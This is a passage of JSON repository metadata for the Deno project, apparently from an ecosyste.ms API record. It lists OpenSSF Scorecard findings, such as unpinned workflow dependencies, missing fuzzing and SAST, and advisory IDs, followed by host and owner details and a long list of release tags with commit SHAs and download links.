https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,